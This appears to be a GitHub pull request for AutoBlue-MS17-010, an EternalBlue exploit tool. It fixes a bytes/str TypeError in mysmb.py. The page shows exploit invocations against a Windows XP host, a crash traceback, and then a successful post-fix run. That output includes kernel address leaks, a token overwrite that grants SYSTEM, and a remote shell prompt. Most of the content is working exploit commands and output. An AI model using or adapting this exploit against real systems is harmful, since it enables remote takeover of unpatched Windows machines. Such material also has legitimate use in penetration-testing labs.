Fix mysmb.py #44

Open
wants to merge 1 commit into
base: master

opabravo

Fix TypeError: descriptor 'encode' for 'str' objects doesn't apply to a 'bytes' object

Machine Info

OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 3 Build 2600
System type: X86-based PC

Error output

┌──(venv-py3.8)─(xxx㉿fsociety)-[/opt/sectools/CVE/AutoBlue-MS17-010]
└─$ python zzz_exploit.py legacy -pipe browser
[*] Target OS: Windows 5.1
[+] Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
Traceback (most recent call last):
  File "zzz_exploit.py", line 1112, in <module>
    main()
  File "zzz_exploit.py", line 1109, in main
    exploit(options.target_ip, int(options.port), username, password, options.pipe, options.share, options.mode)
  File "zzz_exploit.py", line 980, in exploit
    if not info['method'](conn, pipe_name, info):
  File "zzz_exploit.py", line 617, in exploit_fish_barrel
    conn.send_trans_secondary(mid=info['fid'], data=b'\x00', dataDisplacement=NEXT_TRANS_OFFSET+tinfo['TRANS_MID_OFFSET'])
  File "/opt/sectools/CVE/AutoBlue-MS17-010/mysmb.py", line 315, in send_trans_secondary
    self.send_raw(self.create_trans_secondary_packet(mid, param, paramDisplacement, data, dataDisplacement, pid, tid, noPad))
  File "/opt/sectools/CVE/AutoBlue-MS17-010/mysmb.py", line 311, in create_trans_secondary_packet
    _put_trans_data(transCmd, param, data, noPad)
  File "/opt/sectools/CVE/AutoBlue-MS17-010/mysmb.py", line 89, in _put_trans_data
    transData += (b'\x00' * padLen) + str.encode(data)
TypeError: descriptor 'encode' for 'str' objects doesn't apply to a 'bytes' object

Fix `TypeError: descriptor 'encode' for 'str' objects doesn't apply to a 'bytes' object`
@3ndG4me 3ndG4me self-assigned this Dec 24, 2023
@3ndG4me 3ndG4me self-requested a review December 24, 2023 18:28
@3ndG4me 3ndG4me added the bug label Dec 24, 2023
Owner

3ndG4me commented Dec 24, 2023

This looks good, but still need to test it. Just updating the issue to let ya know it is on my radar!

0xSH4RKS commented Apr 18, 2024

Tested this fix, working on kali-2024.1

┌──(kali㉿kali)-[~/tools/AutoBlue-MS17-010]
└─$ python3 zzz_exploit.py 10.101.8.31                 
[*] Target OS: Windows 5.1
[+] Found pipe 'browser'
[+] Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
Traceback (most recent call last):
  File "/home/kali/tools/AutoBlue-MS17-010/zzz_exploit.py", line 1112, in <module>
    main()
  File "/home/kali/tools/AutoBlue-MS17-010/zzz_exploit.py", line 1109, in main
    exploit(options.target_ip, int(options.port), username, password, options.pipe, options.share, options.mode)
  File "/home/kali/tools/AutoBlue-MS17-010/zzz_exploit.py", line 980, in exploit
    if not info['method'](conn, pipe_name, info):
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/tools/AutoBlue-MS17-010/zzz_exploit.py", line 617, in exploit_fish_barrel
    conn.send_trans_secondary(mid=info['fid'], data=b'\x00', dataDisplacement=NEXT_TRANS_OFFSET+tinfo['TRANS_MID_OFFSET'])
  File "/home/kali/tools/AutoBlue-MS17-010/mysmb.py", line 315, in send_trans_secondary
    self.send_raw(self.create_trans_secondary_packet(mid, param, paramDisplacement, data, dataDisplacement, pid, tid, noPad))
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/tools/AutoBlue-MS17-010/mysmb.py", line 311, in create_trans_secondary_packet
    _put_trans_data(transCmd, param, data, noPad)
  File "/home/kali/tools/AutoBlue-MS17-010/mysmb.py", line 89, in _put_trans_data
    transData += (b'\x00' * padLen) + str.encode(data)
                                      ^^^^^^^^^^^^^^^^
TypeError: descriptor 'encode' for 'str' objects doesn't apply to a 'bytes' object
──(kali㉿kali)-[~/tools/AutoBlue-MS17-010]
└─$ python3 zzz_exploit.py 10.101.8.31
[*] Target OS: Windows 5.1
[+] Found pipe 'browser'
[+] Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x87c04da8
SESSION: 0xe1307720
FLINK: 0x16bd48
InData: 0x16ae28
MID: 0xa
TRANS1: 0x168b50
TRANS2: 0x16ac90
modify transaction struct for arbitrary read/write
[*] make this SMB session to be SYSTEM
[+] current TOKEN addr: 0xe2990380
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe2990420
[*] overwriting token UserAndGroups
[*] have fun with the system smb session!
[!] Dropping a semi-interactive shell (remember to escape special chars with ^) 
[!] Executing interactive programs will hang shell!
C:\Windows\system32>
